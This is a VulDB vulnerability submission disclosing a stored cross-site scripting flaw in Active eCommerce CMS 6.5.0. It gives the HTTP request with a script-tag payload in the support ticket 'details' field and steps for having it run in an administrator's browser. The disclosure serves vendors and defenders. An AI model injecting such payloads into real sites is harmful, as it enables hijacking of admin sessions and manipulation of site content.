| Título | Active eCommerce CMS 6.5.0 - Stored XSS |
|---|
| Descrição | Author : skalvin aka (CraCkEr)
Date : 25/06/2023
Website : https://activeitzone.com/active-ecommerce-cms/
Vendor : Active It Zone
Software : Active eCommerce CMS 6.5.0
Vuln Type: Stored XSS
Impact : Manipulate the content of the site
Release Notes:
Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.
## Stored XSS
------------------------------------------------------------
POST /ecommerce/support_ticket HTTP/2
Content-Disposition: form-data; name="details"
<script>alert(1)</script>
------------------------------------------------------------
POST parameter 'details' is vulnerable to XSS
## Steps to Reproduce:
1. Login (as User) "Normal User"
2. Go to [Support Ticket] on this Path (https://website/support_ticket)
3. Click [Create a Ticket]
4. Inject your [XSS Payload] in "Provide a detailed description"
5. Send Ticket
6. When ADMIN Visit [Support Desk] .. [Ticket] to Check [New Tickets] in Administration Panel on this Path (https://website/admin/support_ticket)
7. The ADMIN will click on the [Eye Icon] to View Details and Read The Ticket
8. XSS will Fire & Executed on his Browser
[-] Done |
|---|
| Utilizador | skalvin (UID 49463) |
|---|
| Submissão | 25/06/2023 13h14 (há 3 anos) |
|---|
| Moderação | 04/07/2023 15h50 (9 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 232954 [Active It Zone Active eCommerce CMS 6.5.0 Create Ticket Page support_ticket Detalhes Script de Site Cruzado] |
|---|
| Pontos | 17 |
|---|